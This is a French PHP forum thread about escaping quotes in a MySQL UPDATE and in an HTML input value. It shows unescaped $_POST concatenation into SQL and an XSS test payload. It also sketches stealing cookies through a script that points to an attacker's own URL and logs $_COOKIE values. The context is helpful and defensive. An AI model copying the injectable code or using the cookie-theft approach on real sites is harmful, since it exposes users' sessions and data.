Les " dans la base de données

[sim100]

Bonjour,
Je cherche à enregistrer les données d'un formulaire dans la base MySQL.
Aucun problèmes sauf pour une champs contenant un ou des "

Voila mon code

$query="UPDATE tototo SET ..., biz_small_description=\"".$_POST['biz_small_description']."\ ... WHERE ...";

Voila, si je met un " dans le champs biz_small_description, ce caractère est coupé avec tout ce qu'il y a derrière.

Un moyen d'accepter ça ?

Merci

 

[Julia41]

La fonction mysql_real_escape_string est ton amie :

$query = 'UPDATE toto SET var = \'' . mysql_real_escape_string($_POST['biz_small_description']) . '\';';

déjà ça t'éviteras de te faire hacker en 2s.

Edit: ton www est sensible au XSS au niveau de la fonction "recherche" en haut à droite.

 

[sim100]

Super !
Merci beaucoup

 

[sim100]

Je dérange encore.

Dans le même temps, donc si j'ai mis par exemple dans ma base la valeur : test "" it's ok

Avec des " et des '

Si maintenant d'édite mon formulaire, donc je vais récupérer ce que j'ai mis dans la base

mon code est

<input type="text" name="biz_small_description" value="<?PHP echo $list_edit_ad[33]; ?>" maxlength="255" size="40" />

Mais dans le chmaps, idem, les " dégagent.

Y a t-il une solution ?

Merci beaucoup

 

[spout]

htmlentities() pour l'affichage

 

[sim100]

Ouai merci

 

[Julia41]

Corrige aussi sur ton www si tu as les mains dedans le XSS.
Entre :

<script>alert(document.cookie)</script>

dans la barre de recherche en haut.
Il faut sanitizer ton <title> avec (au moins) htmlspecialchars en sortie et un strip_tags ne ferait pas de mal.

 

[sim100]

Je ne demandais pas pour le site en -www.

Mais que veux tu dire Julia41?
Je ne comprends pas

 

[Julia41]

Je ne demandais pas pour le site en -www.

Mais que veux tu dire Julia41?
Je ne comprends pas

Tu as une faille de sécurité sur ton www. C'est tout. Ce n'est pas forcément très grave surtout que c'est par POST donc un peu moins facile à exploiter qu'un get.
Mais ça reste exploitable.
Si je remplace le document.cookie par quelque chose du style document.open('une url à moi.php')
et que dans ce document .php je mets

foreach ($_COOKIE as $p) 
error_log($p);

Et je récupère tous les cookies et pleins d'autres choses (je ne suis pas un pro pour m'en servir).

 

[sim100]

Ah oui d'accord, bon je vais regarder ça

Merci pour l'info